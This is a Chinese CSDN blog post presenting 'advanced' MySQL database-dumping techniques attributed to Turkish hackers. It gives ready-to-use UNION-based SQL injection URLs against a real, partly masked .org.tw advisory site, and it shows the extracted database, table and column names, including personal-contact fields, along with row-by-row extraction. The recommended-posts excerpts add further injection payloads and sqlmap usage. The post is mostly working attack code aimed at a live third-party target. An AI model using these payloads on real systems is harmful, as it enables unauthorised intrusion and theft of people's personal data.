mysql高级暴库技巧总结(土耳其黑客的手法) - cracer_CSDN

于 2023-07-12 11:55:00 发布
阅读量92 收藏
点赞数
分类专栏: cracer-CSDN 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67888657/article/details/131678561
版权

高级暴库技巧总结

1.判断版本 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询

2.猜解字段数目,

用order by也可以猜,
也可以用union select一个一个的猜解

 and 2=4 union select 1,2,3,4,5,6,7,8,9--

3.查看数据库版本及当前用户,
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--

数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,

4.判断有没有写权限
and (select count(*) from MySQL.user)>0-- 
返回错误,没有写权限

手动猜表

5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1

土耳其黑客的手法
http://www.****.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,mysql,****,vuldb,vulscandb

6.爆表,爆的是****库
http://www.***.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5


7.爆列名,这次爆的是irsys表
http://www.****.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status

8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
http://www.****.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+****.irsys--

返回是3,说明每个列里有3个地段

9.爆字段内容
http://www.****.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+****.irsys+LIMIT+0,1--
爆出name列的第一个字段的内容

http://www.****.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+****.irsys+LIMIT+1,1--
爆出name列的第二个字段的内容

创心域技术网
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql爆库_利用MySQL的报错进行爆库
weixin_35775969的博客
02-03 1305
在这里主要是利用mysql数据库的一个bug1、报错原理,一步一步分析select count(*),concat((select version()),0x7E,left(rand(),3))x from information_schema.tables group by x;从图中可以看出,版本号是5.6.17拿来实战,查询mysql数据库中的user表select * from user ...
mysql爆表_Mysql 通过 information_schema 爆库,爆表,爆字段
weixin_42168230的博客
01-28 189
MySQL 版本大于 5.0 时,有个默认数据库 information_schema,里面存放着所有数据库的信息 (比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。若要从这些视图中检索信息,请指定完全合格的 INFORMATION_SCHEMAview_name名称。列名数据类型描述TABLE_CATALOGnvarchar(128)表限定符。TABLE_SCHEM...
mysql注入在可报错时爆出数据库名与字段名
qq_61955196的博客
04-21 445
mysql中报错爆出数据库名、表名
mysql数据库爆库、爆表、爆字段、爆值的语句
ts6666a的博客
02-06 2797
mysql数据库爆库、爆表、爆字段、爆值的语句 爆库: union select 1,2,3,database(); # 要看多少字段 爆表: union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database(); # 爆字段: union select 1,2,3,group_concat(column_name) from information_...
INFORMATION_SCHEMA.COLUMNS-表的字段信息
weixin_30500105的博客
09-23 320
MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。 若要从这些视图中检索信息,请指定完全合格的 INFORMATION_SCHEMA view_name 名称。 列名数据类型描述 TABLE_CATALOG nvarchar(128...
cracer纪念版渗透测试工具包
05-07
cracer纪念版渗透测试工具包
cracer最新教程
10-08
cracer的教程,3000的价格,现在5积分送出!教你渗透从入门到精通,每节1.5小时的视频,高质量高效率。学习实战两不误
cracer安全学院内部练习靶场
04-13
这是最新大佬分享出来的靶机下载地址,是最新的cracer大佬的靶机地址,解压密码在压缩包内打开即可看到解压密码。希望大家能够希望
2015cracer入侵入门到精通视频教程-附件资源
03-05
2015cracer入侵入门到精通视频教程-附件资源
MySql暴库
专注于性能调优、安全、自动化
05-20 985
http://www.webshell.cc/tag/mysql 暴库之前看看MySql这些版本的特性吧 4.0以下不支持union查询 4.0以上magic_quotes_gpc默认为on(magic_quotes_gpc=on 当php.ini里的 magic_quotes_gpc 为On 时。提交的变量中所有的 ‘ (单引号), ” (双引号), \(反斜
Sqlmap爆库命令的简单使用
1stPeak's Blog
04-24 6477
测试地址:因为涉及商业隐私,这里就不列啦 我这里用的是windows,并没有用kali,所以需要使用sqlmap.py 1.Sqlmap.py -u "网址" 网址存在注入点 可以看出有三个注入点,底下还有其他系统或数据库信息 2.曝出数据库名称 --dbs 可以看出有三个数据库 3.查看web当前使用的数据库 --current -db 4.曝出web数据库使用账户 -...
如何利用SQL注入进行爆库
热门推荐
海枫的专栏
10-30 2万+
SQL注入可以完全爆库,不相信,进来看看,本文一步步介绍爆库的原理和步骤。
爆库漏洞全解
网络小虾
08-21 2092
用挖掘鸡找到网站漏洞,很多网站不修改默认数据库: 文件名:dvbbs6.mbd、dvbbs7.mbd 目录组:/data、/databackup 关键词:dvbbs 动网论坛 欢迎 许愿版漏洞: 文件名:wish.asp 目录组:/wish 关键词:许愿版 爆库漏洞:暴库一般加%5c或者inc,让系统调用数据时出现错误,然后返回数据库提示调用数据出现错误,错误数据里面一般含有数据库...
数据库暴库整理篇
wuhongze的专栏
01-09 957
来源:[jia219]  作者:[jia219]引子:昨天和animator试验了一下,把data.mdb文件改名为data.asp文件后放在wwwroot目录里。然后在IE中输入data.asp路径后,发现IE显示一片空白,右键->察看源文件,跳出记事本,将内容另存为.mdb文件,用ACCESS打开,发现需要密码,也就是说至少文件头被破坏。 然后用Flashget试验下载data.asp文
mysql暴库_大牛教你查库暴库
weixin_35363895的博客
01-28 241
http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解http://www.cert.org.tw/document/adviso...
sqlmap一次实践暴库
Action
06-23 927
http://waning411.blog.51cto.com/4909368/1398926
mysql ,sqlite 常见暴库命令
freshfox的博客
06-23 993
查询数据库有哪些表: select  group_concat(table_name) from information_schema.tables where table_schema=0x74657374;  table_schema 为数据库的名称 ,可以为字符串或0x编码。 查询某表有哪些列:select  group_concat(column_name) from informatio...
暴库漏洞
u010640023的专栏
04-16 2222
之前做过这样的教材,这个是文字说明,有兴趣的去搜索观看 SQL注入流行很久了,我们找漏洞注入目的无非是想得到数据库内的东西,比如用户名密码等,更进一步的MSSQL数据库还可以借此获得权限。基于Access的基础来说,如果我们不用注入就可以得到整个数据库,不是更好吗?于是暴库成了一个比注入更简单的入侵手段。  有关暴库的方法,高手们常在入侵文章中提到,但多是一笔带过,有些就某一个方法谈的,也
cracer安全工具包v8
最新发布
12-04
Cracer安全工具包v8是一款功能强大的安全工具包,旨在帮助用户提升网络安全防护能力。该工具包集成了多种功能模块,包括网络扫描、漏洞分析、数据加密等功能,可以满足用户在日常安全防护中的各种需求。 该工具包以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值